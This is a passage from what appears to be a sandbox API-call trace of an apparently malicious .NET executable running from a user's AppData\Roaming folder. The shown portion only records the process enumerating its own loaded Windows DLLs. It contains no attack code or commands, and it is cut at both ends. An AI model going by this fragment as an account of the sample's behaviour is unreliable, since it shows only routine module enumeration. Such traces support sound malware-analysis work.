lpBaseName="IPHLPAPI.DLL") returned 0xc [0145.942] CoTaskMemFree (pv=0x55b0d0) [0145.942] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.942] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0145.943] CoTaskMemFree (pv=0x55b0d0) [0145.943] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x24ab3d4, cb=0xc | out: lpmodinfo=0x24ab3d4*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0145.944] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.944] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0145.945] CoTaskMemFree (pv=0x55b0d0) [0145.945] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.945] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0145.946] CoTaskMemFree (pv=0x55b0d0) [0145.946] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x24ad4d0, cb=0xc | out: lpmodinfo=0x24ad4d0*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0145.947] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.947] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0145.955] CoTaskMemFree (pv=0x55b0d0) [0145.955] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.955] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0145.956] CoTaskMemFree (pv=0x55b0d0) [0145.956] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x24af5e4, cb=0xc | out: lpmodinfo=0x24af5e4*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0145.957] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.957] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0145.958] CoTaskMemFree (pv=0x55b0d0) [0145.958] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.958] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0145.959] CoTaskMemFree (pv=0x55b0d0) [0145.959] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x24b16f8, cb=0xc | out: lpmodinfo=0x24b16f8*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0145.960] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.960] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0145.961] CoTaskMemFree (pv=0x55b0d0) [0145.961] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.961] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0145.962] CoTaskMemFree (pv=0x55b0d0) [0145.962] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x24b3804, cb=0xc | out: lpmodinfo=0x24b3804*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0145.963] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.963] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0145.964] CoTaskMemFree (pv=0x55b0d0) [0145.964] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.965] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0145.966] CoTaskMemFree (pv=0x55b0d0) [0145.966] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x24b5918, cb=0xc | out: lpmodinfo=0x24b5918*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0145.967] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.967] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0145.968] CoTaskMemFree (pv=0x55b0d0) [0145.968] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.968] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0145.969] CoTaskMemFree (pv=0x55b0d0) [0145.969] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x24b7a44, cb=0xc | out: lpmodinfo=0x24b7a44*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0145.971] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.971] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0145.972] CoTaskMemFree (pv=0x55b0d0) [0145.972] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.972] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0145.973] CoTaskMemFree (pv=0x55b0d0) [0145.973] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x24b9b50, cb=0xc | out: lpmodinfo=0x24b9b50*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0145.975] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.975] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0145.976] CoTaskMemFree (pv=0x55b0d0) [0145.976] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.976] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0145.977] CoTaskMemFree (pv=0x55b0d0) [0145.977] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x24bbc64, cb=0xc | out: lpmodinfo=0x24bbc64*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0145.979] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.979] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0145.980] CoTaskMemFree (pv=0x55b0d0) [0145.980] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.980] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0145.981] CoTaskMemFree (pv=0x55b0d0) [0145.982] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x24bdd70, cb=0xc | out: lpmodinfo=0x24bdd70*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0145.983] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.983] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0145.984] CoTaskMemFree (pv=0x55b0d0) [0145.984] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.984] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0145.986] CoTaskMemFree (pv=0x55b0d0) [0145.986] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x24bfe7c, cb=0xc | out: lpmodinfo=0x24bfe7c*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0145.987] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.987] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0145.988] CoTaskMemFree (pv=0x55b0d0) [0145.989] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.989] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0145.990] CoTaskMemFree (pv=0x55b0d0) [0145.990] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x24c1f88, cb=0xc | out: lpmodinfo=0x24c1f88*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0145.991] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.991] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0145.993] CoTaskMemFree (pv=0x55b0d0) [0145.993] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.993] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0145.998] CoTaskMemFree (pv=0x55b0d0) [0145.998] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x24c409c, cb=0xc | out: lpmodinfo=0x24c409c*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0145.999] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.999] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0146.000] CoTaskMemFree (pv=0x55b0d0) [0146.000] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.000] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0146.002] CoTaskMemFree (pv=0x55b0d0) [0146.002] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x24c61b0, cb=0xc | out: lpmodinfo=0x24c61b0*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0146.003] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.003] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0146.004] CoTaskMemFree (pv=0x55b0d0) [0146.004] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.004] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0146.006] CoTaskMemFree (pv=0x55b0d0) [0146.006] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x24c82bc, cb=0xc | out: lpmodinfo=0x24c82bc*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0146.007] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.007] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0146.008] CoTaskMemFree (pv=0x55b0d0) [0146.008] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.008] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0146.009] CoTaskMemFree (pv=0x55b0d0) [0146.009] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x24ca3c8, cb=0xc | out: lpmodinfo=0x24ca3c8*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0146.011] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.011] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0146.012] CoTaskMemFree (pv=0x55b0d0) [0146.012] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.012] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0146.014] CoTaskMemFree (pv=0x55b0d0) [0146.014] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x24cc4dc, cb=0xc | out: lpmodinfo=0x24cc4dc*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0146.015] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.015] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0146.016] CoTaskMemFree (pv=0x55b0d0) [0146.016] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.016] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0146.017] CoTaskMemFree (pv=0x55b0d0) [0146.017] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x24ce5e8, cb=0xc | out: lpmodinfo=0x24ce5e8*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0146.018] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.018] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0146.020] CoTaskMemFree (pv=0x55b0d0) [0146.020] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.020] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0146.021] CoTaskMemFree (pv=0x55b0d0) [0146.021] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x24d06f4, cb=0xc | out: lpmodinfo=0x24d06f4*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0146.022] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.022] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0146.023] CoTaskMemFree (pv=0x55b0d0) [0146.023] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.023] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0146.025] CoTaskMemFree (pv=0x55b0d0) [0146.025] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x24d2a24, cb=0xc | out: lpmodinfo=0x24d2a24*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0146.026] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.026] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0146.028] CoTaskMemFree (pv=0x55b0d0) [0146.028] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.028] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0146.029] CoTaskMemFree (pv=0x55b0d0) [0146.029] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x24d4b30, cb=0xc | out: lpmodinfo=0x24d4b30*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0146.030] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.030] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0146.031] CoTaskMemFree (pv=0x55b0d0) [0146.032] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.032] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0146.033] CoTaskMemFree (pv=0x55b0d0) [0146.033] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x24d6c3c, cb=0xc | out: lpmodinfo=0x24d6c3c*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0146.034] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.034] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0146.035] CoTaskMemFree (pv=0x55b0d0) [0146.035] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0146.035] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0146.037] CoTaskMemFree (pv=0x55b0d0) [0146.037] CloseHandle (hObject=0x2a0) returned 1 [0146.078] GetCurrentProcessId () returned 0xbb4 [0146.078] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0146.078] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x23e1d3c, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x23e1d3c, lpcbNeeded=0x19e600) returned 1 [0146.079] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x23e1e48, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x23e1e48, lpcbNeeded=0x19e600) returned 1 [0146.080] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x23e2088, cb=0xc | out: lpmodinfo=0x23e2088*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0146.080] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.080] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0146.081] CoTaskMemFree (pv=0x55b780) [0146.081] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.081] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0146.081] CoTaskMemFree (pv=0x55b780) [0146.081] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x23e4294, cb=0xc | out: lpmodinfo=0x23e4294*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0146.081] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.081] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0146.081] CoTaskMemFree (pv=0x55b780) [0146.081] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.081] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0146.082] CoTaskMemFree (pv=0x55b780) [0146.082] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x23e6398, cb=0xc | out: lpmodinfo=0x23e6398*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0146.082] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.082] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0146.082] CoTaskMemFree (pv=0x55b780) [0146.082] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.082] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0146.082] CoTaskMemFree (pv=0x55b780) [0146.082] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x23e84a4, cb=0xc | out: lpmodinfo=0x23e84a4*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0146.083] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.083] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0146.083] CoTaskMemFree (pv=0x55b780) [0146.083] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.083] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0146.083] CoTaskMemFree (pv=0x55b780) [0146.083] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x23ea5b8, cb=0xc | out: lpmodinfo=0x23ea5b8*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0146.083] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.083] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0146.084] CoTaskMemFree (pv=0x55b780) [0146.084] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.084] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0146.084] CoTaskMemFree (pv=0x55b780) [0146.084] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x23ec700, cb=0xc | out: lpmodinfo=0x23ec700*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0146.084] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.084] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0146.084] CoTaskMemFree (pv=0x55b780) [0146.084] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.085] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0146.085] CoTaskMemFree (pv=0x55b780) [0146.085] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x23ee80c, cb=0xc | out: lpmodinfo=0x23ee80c*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0146.085] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.085] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0146.085] CoTaskMemFree (pv=0x55b780) [0146.085] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.085] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0146.086] CoTaskMemFree (pv=0x55b780) [0146.086] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x23f0920, cb=0xc | out: lpmodinfo=0x23f0920*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0146.086] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.086] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0146.086] CoTaskMemFree (pv=0x55b780) [0146.086] CoTaskMemAlloc 